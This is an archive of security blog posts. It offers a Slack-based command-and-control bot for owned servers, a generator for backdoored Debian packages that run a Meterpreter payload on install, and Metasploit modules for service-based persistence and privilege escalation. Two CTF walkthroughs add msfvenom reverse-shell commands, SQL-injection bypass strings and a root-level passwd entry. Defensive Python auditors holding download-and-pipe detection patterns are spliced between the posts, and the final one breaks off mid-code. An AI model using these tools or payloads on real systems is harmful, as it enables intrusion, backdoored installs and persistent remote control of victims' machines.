Saturday 6 May 2017

SlackBots - Rebirth of IRCbots?

It hasn't been long since Jeremy and Jeff Dimmock made a post, and after a bit of googling I came up with an idea: "why not make something like IRC bots with Slack?" Really nice write-ups .. if you find my post boring you can check their posts, which I mention at the bottom of my post lol.

code => https://github.com/ChaitanyaHaritash/SlackBot

What is Slack?

Slack is a cloud-based team collaboration tool founded by Stewart Butterfield. Slack began as an internal tool used by their company, Tiny Speck, in the development of Glitch, a now defunct online game. The name is an acronym for "Searchable Log of All Conversation and Knowledge".
https://en.wikipedia.org/wiki/Slack_(software)

What are SlackBots?

Slack bots basically work over POST/GET requests, and JSON plays a huge role in making that possible.
Slack bots are really helpful for giving automated responses to some common messages in the chat area and handling various other tasks ..
Here I've used the same thing from a red team perspective :P I just defined some commands in the script and the exact response each should put up in the chat area.

How this magic happens?

Well, I used a Python module made by Slack, "slackclient".. I just set up a local server with port 5000 forwarded, for which I used ngrok .. and when all the required fields are filled in the script it just kicks everything off...
My main focus was on making something which requires fewer dependencies and works as a non-privileged user too .. for example, to gain persistence over owned servers exactly like traditional IRC bots used to do back in the day (don't know about these days lol).
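The outgoing webhook that Slack POSTs to the port-5000 server is the piece that makes hijacking harder than with IRC (the "2 keys" point in the Conclusion), but only if the receiver actually checks it; otherwise anyone who discovers the forwarding URL can feed the bot forged messages. The following Python is an added example and not code from the SlackBot repository: it decodes the legacy outgoing-webhook form body, compares the `token` field against the configured webhook token (the post's o_token) in constant time, and rejects stale deliveries. The request bodies and `EXPECTED_TOKEN` are constructed placeholders; the field names follow Slack's legacy outgoing-webhook format.

```python
import hmac
import time
from typing import Optional, Tuple
from urllib.parse import parse_qs

# Placeholder for the token Slack shows when the outgoing webhook is created (o_token in the post).
EXPECTED_TOKEN = "PLACEHOLDER-outgoing-webhook-token"
MAX_AGE_SECONDS = 60  # deliveries older than this are treated as replays


def parse_outgoing_webhook(body: str) -> dict:
    """Decode the application/x-www-form-urlencoded body of a legacy outgoing webhook."""
    return {key: values[0] for key, values in parse_qs(body, keep_blank_values=True).items()}


def verify_outgoing_webhook(body: str, expected_token: str,
                            now: Optional[float] = None) -> Tuple[bool, str]:
    """Return (accepted, reason). A delivery is accepted only if its token matches and it is fresh."""
    fields = parse_outgoing_webhook(body)
    token = fields.get("token", "")
    # Constant-time comparison: a plain == would leak how many leading characters were right.
    if not hmac.compare_digest(token.encode(), expected_token.encode()):
        return False, "token mismatch"
    try:
        sent_at = float(fields.get("timestamp", ""))
    except ValueError:
        return False, "missing or malformed timestamp"
    current = time.time() if now is None else now
    if abs(current - sent_at) > MAX_AGE_SECONDS:
        return False, "stale delivery (possible replay)"
    # With trigger words configured, Slack only delivers text that starts with one of them.
    if not fields.get("text", "").startswith(fields.get("trigger_word", "")):
        return False, "text does not start with the trigger word"
    return True, f"ok: #{fields.get('channel_name')} <{fields.get('user_name')}> {fields.get('text')}"


# Constructed sample deliveries; field names follow Slack's legacy outgoing-webhook format.
GENUINE = ("token=" + EXPECTED_TOKEN
           + "&team_id=T0000&channel_id=C0000&channel_name=general"
           + "&timestamp=1700000000.000100&user_id=U0000&user_name=alice"
           + "&text=help&trigger_word=help")
FORGED = GENUINE.replace(EXPECTED_TOKEN, "guessed-token")   # right URL, wrong token
REPLAYED = GENUINE                                           # same body, delivered much later

if __name__ == "__main__":
    print(verify_outgoing_webhook(GENUINE, EXPECTED_TOKEN, now=1700000000.0))
    print(verify_outgoing_webhook(FORGED, EXPECTED_TOKEN, now=1700000000.0))
    print(verify_outgoing_webhook(REPLAYED, EXPECTED_TOKEN, now=1700009999.0))
```

The `now` parameter exists only so the freshness check can be exercised deterministically; in a live receiver it defaults to the wall clock.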

HELP?  

[os] - Retrieve OS and current user info
[issue] - Issue of the Linux box
[p_ip] - Retrieve public IP of the box
[uname] - Uname of the box
[coffee] - Print a fancy coffee mug in the chat area
[help] - List all help and abilities you have with this bot
[shell] - Execute a shell command
[meterpreter] - Spawn a Meterpreter session

Meterpreter Shell Via Bot

Actually it wasn't tough for me at all, because I've done the same thing before with Kimi ..
I just used the web_delivery module here...


Client Side:
$ ./bot.py

Attacker side :
$ sudo msfconsole -qx 'use exploit/multi/script/web_delivery; set srvhost <host_ip>; set lhost <host_ip>; set uripath /SecPatch'

chat_area> meterpreter <attacker_ip>

Getting Everything Set

>Generate a "Legacy Token" and paste it into the "s_token" variable space in the script


>Download and install ngrok and forward port 5000 with "./ngrok http 5000",

>Grab one of the temporary forwarding links it generates and use it to generate an outgoing webhook token: select the channel name, paste the forwarding link into the URL field and copy the token it generates (don't forget to put "lol" in the URI).


> Now just fill in all the variable spaces in the script (o_token,s_token,CHAT_A).

The hard part finishes here .. I know how many hours I've spent understanding all this :P
Now let's test!!
Okay, move to your chat area and run the script ;) Don't worry about modules, they'll get installed automatically; you just gotta restart it and it'll run smoothly on the second try.


Voila! so its working good ;)

Conclusion

This bot is the result of curiosity, so please use it for research and study :)
It's completely open source code, so you are free to pursue further development on it...
Slack bots can be the next generation of IRC bots for sure .. in fact better than IRC bots, because besides this Slack provides other services too, like directly interacting with the IRC you have, so you can combine both of them to come up with something awesome :D .. I still have to explore so many of them pfff :P

Also, as far as I've observed, Slack bots are more secure than IRC bots in terms of hijacking, as it requires 2 keys to join a channel, whereas with IRC bots one can easily jump into the channel and hijack it .. also IRC servers were easily compromised with UnrealIRCD exploits....
So overall it's a good place to grow a bot farm :)

NOTE:: 

The "shell" option is delivering commands to the victim box but is not delivering the results to the chat area .... I ended up scratching my head and finally added the meterpreter payload as its substitute, so if you come up with an idea then do ping me on twitter :) would be happy to have your suggestions...

MISC


Doubts? Insults?

@bofheaded

Saturday 4 March 2017

KIMI - Malicious Debian Package Creator

Hey readers !
Towards the end of last month I was thinking about the latest updates of Venom Shellcode Generator, and while having a conversation with r00t-3xp10it I struck on an idea for generating malicious Debian packages, which I had earlier been in the mood to implement in my paused project "Ginni Botnet".

This post is for all those who still have doubts for Kimi.

I did a bit of research on basically "how can I make it dependency free", because I've seen loads of methods in which 3rd-party tools were involved, and as I'm too lazy to install dependency tools I decided to make one of my own :') .

The name Kimi is inspired by "Kimimaro", one of my favourite characters from the anime "Naruto".

Kimi is a script which generates a malicious Debian package for Metasploit
which consists of a bash file; the same bash file is deployed into the "/usr/local/bin/" directory.

The backdoor gets executed as soon as the victim tries to install the deb package, thanks to the postinst file.

The bash file is injected and also acts like some system command, so when the victim executes it
the attacker is hit with a session.
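Since the whole trick of Kimi is a maintainer script that runs at install time, the defensive counterpart is to look inside a .deb before installing it. The Python below is an added example, not part of Kimi or Venom: a .deb is an ar archive holding debian-binary, control.tar.* and data.tar.*, so the code parses that container and the two tarballs with only the standard library, flags maintainer-script lines that fetch something or pipe it into a shell, and reports files the package would drop into /usr/local/bin (a directory Debian policy reserves for the local admin). Both sample packages are constructed in memory; the `package-mirror.invalid` URL is a placeholder.

```python
import io
import re
import tarfile

AR_MAGIC = b"!<arch>\n"
MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")
# Shell patterns that fetch-and-run or decode-and-run something during package install.
DOWNLOAD_EXEC = re.compile(
    r"\b(curl|wget)\b|\|\s*(ba)?sh\b|python[23]?\s+-c|/dev/tcp/|base64\s+(-d|--decode)|\bnc\b"
)


def ar_pack(members):
    """Build a minimal ar archive, the outer container of every .deb, from (name, bytes) pairs."""
    out = bytearray(AR_MAGIC)
    for name, data in members:
        header = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode()
        out += header + data
        if len(data) % 2:                      # ar members are 2-byte aligned
            out += b"\n"
    return bytes(out)


def ar_unpack(blob):
    """Parse an ar archive into {member name: bytes}."""
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive")
    pos, members = len(AR_MAGIC), {}
    while pos + 60 <= len(blob):
        header = blob[pos:pos + 60]
        if header[58:60] != b"`\n":
            raise ValueError("corrupt ar member header")
        name = header[:16].decode().rstrip(" /")   # GNU ar appends '/', dpkg-deb does not
        size = int(header[48:58].decode().strip())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)
    return members


def tar_pack(entries):
    """Build a control.tar.gz / data.tar.gz style archive from (path, bytes, mode) tuples."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for path, data, mode in entries:
            info = tarfile.TarInfo(path)
            info.size, info.mode = len(data), mode
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def tar_read(blob):
    """Return {normalised path: (mode, bytes or None)} for any compression tarfile understands."""
    result = {}
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:*") as tf:
        for m in tf.getmembers():
            path = m.name[2:] if m.name.startswith("./") else m.name.lstrip("/")
            result[path] = (m.mode, tf.extractfile(m).read() if m.isfile() else None)
    return result


def audit_deb(deb):
    """Inspect a .deb without installing it and return human-readable findings."""
    members = ar_unpack(deb)
    control = [n for n in members if n.startswith("control.tar")]
    data = [n for n in members if n.startswith("data.tar")]
    if not control or not data:
        raise ValueError("missing control.tar or data.tar member")
    findings = []
    scripts = tar_read(members[control[0]])
    for script in MAINTAINER_SCRIPTS:
        _, content = scripts.get(script, (0, None))
        if content is None:
            continue
        for lineno, line in enumerate(content.decode(errors="replace").splitlines(), 1):
            if DOWNLOAD_EXEC.search(line):
                findings.append(f"{script}:{lineno}: {line.strip()}")
    for path in tar_read(members[data[0]]):
        if path.startswith("usr/local/bin/"):
            findings.append(f"data: installs into /usr/local/bin (reserved for the local admin, not for packages): /{path}")
    return findings


# Constructed sample packages; no real project files are involved.
MALICIOUS_DEB = ar_pack([
    ("debian-binary", b"2.0\n"),
    ("control.tar.gz", tar_pack([
        ("./control", b"Package: nano\nVersion: 1.0\nArchitecture: all\nMaintainer: x\nDescription: sample\n", 0o644),
        ("./postinst", b"#!/bin/sh\n# constructed sample maintainer script\n"
                       b"curl -s http://package-mirror.invalid/setup.sh | sh &\nexit 0\n", 0o755),
    ])),
    ("data.tar.gz", tar_pack([("./usr/local/bin/nano", b"#!/bin/sh\necho placeholder\n", 0o755)])),
])
BENIGN_DEB = ar_pack([
    ("debian-binary", b"2.0\n"),
    ("control.tar.gz", tar_pack([
        ("./control", b"Package: hello\nVersion: 1.0\nArchitecture: all\nMaintainer: x\nDescription: sample\n", 0o644),
        ("./postinst", b"#!/bin/sh\nset -e\nldconfig\nexit 0\n", 0o755),
    ])),
    ("data.tar.gz", tar_pack([("./usr/bin/hello", b"#!/bin/sh\necho hello\n", 0o755)])),
])

if __name__ == "__main__":
    for label, pkg in (("malicious", MALICIOUS_DEB), ("benign", BENIGN_DEB)):
        print(label, audit_deb(pkg) or ["no findings"])
```

To run it against a real file, `audit_deb(open("some.deb", "rb").read())` is enough; the pattern list is deliberately short and should be treated as a starting point, not a verdict.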

[Plus Points]
-- Fully independent. Means the user has no need to install any Debian package creator
-- Can be integrated with any payload generator easily, since it is driven by command-line arguments.

[Download Link]
git clone https://github.com/ChaitanyaHaritash/kimi 
[Getting Everything Set]
Kimi basically depends upon the web_delivery module and everything is automated.
All the attacker needs to do is use the following command:

sudo python kimi.py -n nano -l 127.0.0.1 -V 1.0
[NOTE]
This project was made to be integrated with Venom Shellcode Generator 1.0.13.
It can also be used standalone; all the user needs to do is change the uripath in the msf variables.
------------------------------------------------------------------------------------------------------------

[Tested on ]
-- Linux Mint 17.2 Cinnamon (Ubuntu 14.04) 
-- ParrotOS (Debian Jessie)
-- Kali Rolling 2.0

[Updates from prototype]
-- Added "postinst" file creation function to make execution of the embedded malicious file automated
-- Added RC file generation function to fully automate opening the handler, meaning no need to
    set the handler manually.
-- Patched some common bugs [special thanks to r00t 3xp10it :)]

[In Action]




[Video]



Insults and doubts are most welcome :') @bofheaded #SSA

Monday 5 December 2016

CTF HackDay: Albania - WalkThrough

Hey Readers,
So here I am with another CTF I've recently solved. It was kinda tricky (unexpectedly), but after irritating seniors with my problems related to it, I finally managed to solve it all :P .

Download > https://www.vulnhub.com/entry/hackday-albania,167/


So first things first: determining the target. I scanned the network for live devices (our target had the IP "192.168.0.107").

Alright, I did an intense scan on our target, covering port range 0-10000, and finally ended up with 2 open ports: 8008 (Apache server) and 22 (SSH). I also got some directories.

$ sudo nmap -T4 -A -v -p 0-10000 192.168.0.107


Dirs I got:

/rkfpuzrahngvat/
/slgqvasbiohwbu/
/tmhrwbtcjpixcv/
/vojtydvelrkzex/
/wpkuzewfmslafy/
/xqlvafxgntmbgz/
/yrmwbgyhouncha/
/zsnxchzipvodib/
/atoydiajqwpejc/
/bupzejbkrxqfkd/
/cvqafkclsyrgle/
/unisxcudkqjydw/
/dwrbgldmtzshmf/
/exschmenuating/
/fytdinfovbujoh/
/gzuejogpwcvkpi/
/havfkphqxdwlqj/
/ibwglqiryexmrk/
/jcxhmrjszfynsl/
/kdyinsktagzotm/
/lezjotlubhapun/
/mfakpumvcibqvo/
/ngblqvnwdjcrwp/
/ohcmrwoxekdsxq/
/pidnsxpyfletyr/
/qjeotyqzgmfuzs/

I then opened the link "192.168.0.107:8008" on which Apache was running and got prompted with a message box "Ne qofte se jam UNE, e di se ku te shkoj" > translated > "If I am, I know where to go".



I started visiting each dir and ended up with a meme :/


But there I found a directory named "unisxcudkqjydw" which had a slightly different page asking me to go to "/unisxcudkqjydw/vulnbank/" with the message "IS there any /vulnbank/ in there ???". I visited that link and got the login page of some "Vuln Bank".


I tried some random combinations for auth bypass but unfortunately none of them worked, except one:

Username : " '
Password : " '

Got prompted with an SQL error. I thought it was my lucky shot :P and tried sqlmap and various other SQLi tools, but the result was negative :/


Finally I downloaded a list of usernames and passwords and ran it through hydra. LOL, my luck really worked (I don't use hydra and hate brute-force attacks :/ :P).
I got a working combination:

Username : ' or 'a' = 'a' --
Password : #


Okay!! So I was finally seeing some hope of solving it :).

Tried uploading PHP files directly, but that didn't work. I immediately generated a PHP backdoor via msfvenom and renamed it with the extension ".php.jpg". Opened a handler and executed the payload by visiting the link where it had been saved.


Then I just got a bash shell with the command:

$ /usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'


I then checked all the files and directories carefully for some hint, but everything was useless. I thought config.php would work. I opened it and got the user and password for MySQL with root credentials; I thought they could be the same credentials for the root user login too, but the result was negative.

After getting literally cooked up :P I checked for writable files on the machine with the command:

$  find / -writable -type f 2>/dev/null

LOL, I noticed /etc/passwd was writable :P Bingo!! There I struck on an idea ... "what if I manually add another user to the passwd file?" (Reference which helped me).

I then generated a password hash using openssl.

Username : dope
Password : dope


Now I just went back to meterpreter. Opened and edited /etc/passwd with the "edit" option. Added the new user at the bottom and saved the file.

dope:$1$MamNpKxX$/zIJhc75C0O9zRrTxxGYB/:0:0:test:/root:/bin/bash

The edited /etc/passwd looked like:


Here I started to feel I would soon be escalated to root privileges.

And finally, I ran the command "su", entered the password for the user I had just made, and Boom!! It worked :P Finally I captured the flag :D

$ su dope  
$ id
$ cd /root && cat flag.txt
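The escalation above works because /etc/passwd was writable and accepted a second UID 0 entry carrying its own password hash. As an added example (not from the original walkthrough), this Python audit parses passwd content together with the file mode and reports exactly those conditions: a world- or group-writable file, extra UID 0 accounts, password hashes stored in passwd rather than shadow, and empty password fields. The sample passwd text is constructed, and the hash in it is a placeholder rather than the one used in the walkthrough.

```python
import os
import stat
from dataclasses import dataclass


@dataclass
class PasswdEntry:
    name: str
    password: str   # 'x' means the hash lives in /etc/shadow
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text):
    """Parse passwd content; returns (entries, list of malformed-line descriptions)."""
    entries, malformed = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            malformed.append(f"line {lineno}: expected 7 fields, got {len(parts)}")
            continue
        try:
            entries.append(PasswdEntry(parts[0], parts[1], int(parts[2]), int(parts[3]), *parts[4:]))
        except ValueError:
            malformed.append(f"line {lineno}: non-numeric uid/gid")
    return entries, malformed


def audit_passwd(text, mode):
    """Report the conditions the walkthrough abused; mode is the st_mode of the passwd file."""
    findings = []
    perm = stat.S_IMODE(mode)
    if mode & stat.S_IWOTH:
        findings.append(f"/etc/passwd is world-writable (mode {perm:o})")
    elif mode & stat.S_IWGRP:
        findings.append(f"/etc/passwd is group-writable (mode {perm:o})")
    entries, malformed = parse_passwd(text)
    findings.extend(malformed)
    for e in entries:
        if e.uid == 0 and e.name != "root":
            findings.append(f"extra UID 0 account: {e.name} (home {e.home}, shell {e.shell})")
        if e.password == "":
            findings.append(f"empty password field for {e.name}: no password needed to log in")
        elif e.password not in ("x", "*", "!"):
            findings.append(f"password hash stored in passwd for {e.name} "
                            f"(should be 'x' with the hash in /etc/shadow)")
    return findings


def audit_passwd_file(path="/etc/passwd"):
    """Run the audit against a real passwd file on the current host."""
    with open(path) as fh:
        return audit_passwd(fh.read(), os.stat(path).st_mode)


# Constructed sample; the dope line mimics the walkthrough's edit but with a placeholder hash.
CLEAN_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "alice:x:1000:1000:Alice:/home/alice:/bin/bash\n"
)
TAMPERED_PASSWD = CLEAN_PASSWD + "dope:$1$PLACEHOLDER$notarealhash:0:0:test:/root:/bin/bash\n"

if __name__ == "__main__":
    # 0o100666 is a regular file with world-writable permissions, the weak state used for the demo.
    for finding in audit_passwd(TAMPERED_PASSWD, 0o100666):
        print(finding)
```

On a real host `audit_passwd_file()` reads /etc/passwd and its mode; an empty result is the expected state, and any UID 0 entry other than root deserves an immediate look.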


Special Thanks to: VulnHub :) <3
Follow me on twitter : https://twitter.com/Indi_g34r

Sunday 13 November 2016

deploy_service_payload - Post MSF module For Deploy A Persistence Service Payload

[What Does This Module Do?] 
deploy_service_payload.rb uploads your payload.exe to the target system (DEPLOY_PATH) and creates a service pointing to it (SERVICE_NAME).

The service will auto-start with Windows with Local/System privileges. Rebooting the system or restarting the service will run the malicious executable with elevated privileges. "WARNING: This
module only supports .exe executables for upload."

[NOTE]

BUILD SERVICE PAYLOAD:
$ sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<Attacker Port> -a x86 --platform windows -f exe-service -o Program.exe

--WARNING: This module will not delete the payload deployed.
--WARNING: Note that only executables explicitly written to interface with the Service Control
  Manager should be installed this way. While SC will happily accept a regular non-service binary,
  you will receive the fatal Error 1053 when you attempt to start the service; please read the following
  article: How to Run Any Program as a Background Service in Windows

[INFO]



[INSTALLATION]

1* Download the module from {HERE}
2* Copy the ruby file into
/{path}/metasploit-framework/modules/post/windows/manage/
3* Open msfconsole and issue the command "reload_all" to reload paths.
4* use post/windows/manage/deploy_service_payload

[ADVANCED OPTIONS]



[USAGE]

NOTE: In the following example we are going to deploy a NETCAT executable from the attacker machine (using netcat [ nc.exe ] is not mandatory; the default is to deploy a built-in service executable).

To be able to deploy a NETCAT client we need to activate the module options 'USE_NETCAT' | 'NC_LHOST' | 'NC_LPORT' and manually set up a NETCAT listener to receive the remote service connection...


-- DEPLOYING PAYLOAD :

1* set USE_NETCAT true
2* set NC_LPORT 31337
3* set NC_LHOST 192.168.0.100
4* set DEPLOY_PATH {deployment path in victim box}
5* set LOCAL_PATH /home/{user}/Desktop/nc.exe {executable to be uploaded}
6* set PAYLOAD_NAME nc.exe
7* set SERVICE_NAME infection
8* set SESSION 1

{Opening a netcat listener on the desired port to receive the remote service connection}

$ sudo nc -lvp 31337

Expected Results :  


-- HIDING PAYLOAD :

1* set HIDDEN_ATTRIB true
2* set DEPLOY_PATH {deployment path in victim box}
3* set PAYLOAD_NAME nc.exe
4* set SESSION 1

Expected Results :


-- CHECKING SERVICE STATUS :

1* set SERVICE_STATUS true
2* set SERVICE_NAME infection
3* set SESSION 1

Expected Results :


-- DELETING REMOTE SERVICE :

1* set DEL_SERVICE true
2* set SERVICE_NAME infection
3* set SESSION 1
--WARNING: This module will not delete the payload deployed.
Expected Results :


[VIDEO DEMO]




[Credits]

Module Author: pedr0 Ubuntu [r00t-3xp10it]
Special Thanks: Fatima Ferreira | Chaitanya



Sunday 30 October 2016

WSearch - Privilege Escalation via Weak Service Permissions (MSF Module)

Hi guys!!
So, after almost a week full of hard work we have finally made another post module for Windows privilege escalation, following MSI_privilege_escalation.

[What is WSearch ?]

SearchIndexer.exe is the Windows service that handles indexing of your files for Windows Search, which fuels the file search engine built into Windows that powers everything from the Start Menu search box to Windows Explorer, and even the Libraries feature.  --Wikipedia

[INFO]

--Vendor : Microsoft WSearch (windows indexing) service [SearchIndexer.exe]
--Vulnerability Type : Persistence backdooring + Privilege Escalation
--Versions Affected : Windows XP, VISTA, 7, 8, 9, 10
--Severity : critical

--Description:
The WSearch service uses one executable.exe set in binary_path_name
and runs it as Local/System at startup; this enables local privilege escalation / persistence backdooring.
To exploit this, a local attacker needs to replace the executable in the binary_path_name
of the service. Rebooting the system or restarting the service will run the malicious executable with
elevated privileges.

[What factors are affecting privilege escalation on windows with the help of this application ?]


                                                                     

We ran the command "sc query WSearch" and got the result that its state is always running.
From this we can conclude that our backdoor can execute all the time and keep the system under the illusion that the original process (WSearch) is still there, which could lead to persistence.



We can see that the application is running with NT AUTHORITY privileges, so we can make it persistent with administrator privileges.



And finally, we can observe that the application's START_TYPE is set to AUTO_START mode, which means the process will start right after boot. We can also observe that the BINARY_PATH_NAME can be replaced, so we can save our backdoor under the application's name, i.e. SearchIndexer.exe can be replaced with a backdoor that has the same name as the application.

After concluding all these symptoms, we can now build a Metasploit's post module for privilege escalation.
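Both this post and the deploy_service_payload post above rely on a service whose BINARY_PATH_NAME points at an attacker-supplied executable, and `sc qc` exposes every field a defender needs to spot that. The following Python is an added example (not part of either Metasploit module): it parses `sc qc` output for one or more services and flags binaries in user-writable locations or outside C:\Windows and Program Files, plus system-service binary names such as SearchIndexer.exe loaded from outside System32. The `sc qc` text is constructed; the `infection` service name and nc.exe path mirror the usage example in the deploy_service_payload post.

```python
import re

# Binary names that belong to Windows services and should only ever load from System32.
SYSTEM_SERVICE_BINARIES = {"searchindexer.exe", "svchost.exe", "lsass.exe", "services.exe", "spoolsv.exe"}
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\temp\\", "c:\\windows\\temp\\")


def parse_sc_qc(text):
    """Parse the output of one or more `sc qc <name>` calls into {service: {field: value}}."""
    services, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        match = re.match(r"SERVICE_NAME:\s*(\S+)", line)
        if match:
            current = services.setdefault(match.group(1), {})
            continue
        if current is None or ":" not in line:
            continue
        key, _, value = line.partition(":")
        if key.strip():                          # continuation lines (extra DEPENDENCIES) have no key
            current[key.strip()] = value.strip()
    return services


def binary_path(field):
    """Reduce BINARY_PATH_NAME to the executable path, lower-cased, without arguments."""
    field = field.strip()
    if field.startswith('"'):
        return field[1:].split('"', 1)[0].lower()
    match = re.match(r"(.*?\.exe)", field, re.IGNORECASE)   # unquoted path, possibly with spaces
    return (match.group(1) if match else field.split(" ", 1)[0]).lower()


def audit_services(services):
    """Flag service binaries that look like a deployed persistence payload."""
    findings = []
    for name, cfg in services.items():
        path = binary_path(cfg.get("BINARY_PATH_NAME", ""))
        if not path:
            continue
        exe = path.rsplit("\\", 1)[-1]
        start = " ".join(cfg.get("START_TYPE", "").split()[1:]) or "unknown start type"
        run_as = cfg.get("SERVICE_START_NAME", "") or "LocalSystem"   # empty field means LocalSystem
        if path.startswith(USER_WRITABLE_PREFIXES):
            findings.append(f"{name}: binary in user-writable location {path} (runs as {run_as}, {start})")
        elif not path.startswith(TRUSTED_PREFIXES):
            findings.append(f"{name}: binary in non-standard location {path} (runs as {run_as}, {start})")
        if exe in SYSTEM_SERVICE_BINARIES and not path.startswith("c:\\windows\\system32\\"):
            findings.append(f"{name}: system binary name {exe} loaded from outside System32: {path}")
    return findings


# Constructed `sc qc` output: the genuine WSearch entry and a service planted the way the
# deploy_service_payload example does it.
SAMPLE_SC_OUTPUT = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WSearch
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\SearchIndexer.exe /Embedding
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Windows Search
        DEPENDENCIES       : RPCSS
                           : BrokerInfrastructure
        SERVICE_START_NAME : LocalSystem

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: infection
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\Public\nc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : infection
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

if __name__ == "__main__":
    for finding in audit_services(parse_sc_qc(SAMPLE_SC_OUTPUT)):
        print(finding)
```

Note the limit of a configuration audit: the in-place replacement this post describes keeps the original BINARY_PATH_NAME, so only a signature or hash comparison of SearchIndexer.exe on disk against a known-good copy would reveal it; the audit above catches the new-service case and the renamed-binary-elsewhere case.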



[Advanced Options]



[Proof Of Concept]

--Installation Steps : 

  1. Download module from [ here ] & copy  persist_priv_Wsearch.rb to 
      ../{path}/metasploit-framework/modules/post/windows/escalate/persist_priv_Wsearch.rb
  2. open msfconsole and execute command "reload_all"

-- Exploitation Steps :

1. Get meterpreter session somehow
2. use post/windows/escalate/persist_priv_Wsearch
3. Rename your backdoor to "SearchIndexer.exe"
4. Set UPLOAD_PATH <path to backdoor.exe>
5. set session <session_id> 
6. exploit

 Expected Results : 


-- Reverting Everything To Normal : 

1. set DELETE_PERSISTENCE true
2. set session <session_id>
3. exploit

  Expected Results :



-- Checking Service Setting 

1. set SERVICE_STATUS true
2. exploit

    Expected Results : 



--[Credits] : Pedro Ubuntu [r00t 3xp10it]  | milton_barra | Chaitanya Haritash

Saturday 15 October 2016

CTF FristiLeaks: 1.3 - Walkthrough

I generally don't solve CTFs, but after viewing a walkthrough by one of my close friends I thought even I must give it a try :P (yea, these days I've had less work compared to the past few weeks and I watched too many movies ;_;).

So, I thought to try FristiLeaks 1.3. Yea, in the beginning it was a bit puzzling, but then I started getting ideas about the further challenges one after another.


So first things first: let's scan for live hosts in our network and grab the open ports of the target host.


$ nmap -sn 192.168.0.0/24


$ nmap -T4 -A -v 192.168.0.100


OK! So I got port 80 open here with 3 disallowed entries: /cola, /sisi, /beer. Nice, let's check them.


Our main page; let's check cola, sisi, beer :D


Damn!! I got nothing except this meme :/ so I tried some random links and finally found something on /fristi :D and yea, it was a login page!!


Here I began checking the page source and found some encoded data; my guess was that it was base64.




Here I scrolled up a bit and found an image being decoded, so I decided to replace the image's base64 with the base64 blob I had found elsewhere in the code.


Bingo!! After decoding the base64 I got some weird text "keKKeKKeKkEkkEk". LOL, easy guess: "PASSWORD" :V . I then started searching for the username, and the one thing which diverted my mind the most was a note inside the page source.


"TODO:
 We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz
"

Now nothing here looks suspicious except the name of the one who left this comment, "eezeepz".

I decided to try the combination

username : eezeepz
password : keKKeKKeKkEkkEk

and got access :D wew!!

Next, the only option I found was to upload files, but only in image format (I tried directly with the .php format and that didn't work).

So I generated a PHP payload via msfvenom and changed its extension to .php.png

$  sudo msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f raw


lol meterpreter i love u :P 





Let's try to gain access to a bash shell :D


Let's check the users in the home dir.


OK, so there are 3 users, of which I have permission to access the "eezeepz" user's directory.


I did "ls -la" to list everything with its permissions. There were so many files which looked like commands from /usr/bin, but one file caught my attention: a text file named "notes.txt", so I ran "cat notes.txt" to open it and found hints for the next challenge.



OK, so as it simply says, I have the privilege to use commands like chmod, df, cat, echo, ps, grep, egrep,
and if I execute any of them by writing to the file "runthis" in the /tmp dir, I'll have my results delivered to a file named "cronresult". LOL, no guessing needed; it was certain that the admin user was the route to the other users and eventually to root. "chmod 777 admin -R"

I decided to change the permissions of user admin's dir, as I had the privilege to use the "chmod" command. I executed the following set of commands and got the positive result I expected :P.

$ echo "/usr/bin/../../bin/chmod -R 777 /home/admin" > /tmp/runthis
$ ls -lah /home
$ ls -alh /home/admin
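The cron job that executes /tmp/runthis is a classic weak spot: a privileged job reading a file from a world-writable directory lets any local user choose what it runs. As an added example that is not part of the original walkthrough, the Python below parses /etc/crontab-style text, extracts the absolute paths each job touches, and flags paths that are writable by others, live in a directory writable by others, or do not exist yet in such a directory (the runthis case, where the attacker simply creates the file). The `demo()` function builds the scenario in a temporary directory with a constructed crontab, so nothing on the real host is touched.

```python
import os
import shlex
import stat
import tempfile


def cron_jobs(text):
    """Return (lineno, user, command) for each job in /etc/crontab-style text (6th field = user)."""
    jobs = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                                   # blank, comment, or VAR=value line
        parts = line.split(None, 2) if line.startswith("@") else line.split(None, 6)
        if len(parts) >= 3:
            jobs.append((lineno, parts[-2], parts[-1]))
    return jobs


def referenced_paths(command):
    """Absolute paths a job's command line touches, ignoring redirection targets."""
    paths, skip_next = [], False
    for token in shlex.split(command):
        if skip_next:
            skip_next = False
        elif token in (">", ">>", "<", "2>"):
            skip_next = True                           # the next token is a redirection target
        elif token.startswith("/"):
            paths.append(token)
    return paths


def writable_by_others(st):
    return bool(st.st_mode & (stat.S_IWOTH | stat.S_IWGRP))


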